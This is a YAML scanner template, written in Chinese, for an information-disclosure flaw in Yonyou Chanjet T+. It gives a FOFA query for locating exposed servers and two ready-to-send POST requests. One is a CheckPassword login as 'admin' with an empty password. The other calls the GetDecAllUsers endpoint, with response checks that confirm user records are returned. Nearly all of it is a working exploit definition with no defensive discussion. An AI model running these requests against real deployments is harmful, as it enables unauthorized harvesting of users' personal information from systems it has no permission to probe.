product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus getdecallusers信息泄露
type: 信息泄露
vID: [ ]
level: 3
vDesc: 用友 畅捷通T+ getdecallusers 存在信息泄露漏洞，可获取系统用户个人信息
version: ''
note: ''
search:
  FOFA: app="畅捷通-TPlus"
protocol: http
link: https://blog.csdn.net/nglj9527/article/details/139302990
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
      json: { "AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": "" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - error
            logic: and
  - exp:
      method: post
      follow: false
      path: /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
      json: { "condition": "", "accNum": "", "onlyBuying": "false" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - UserId
            logic: and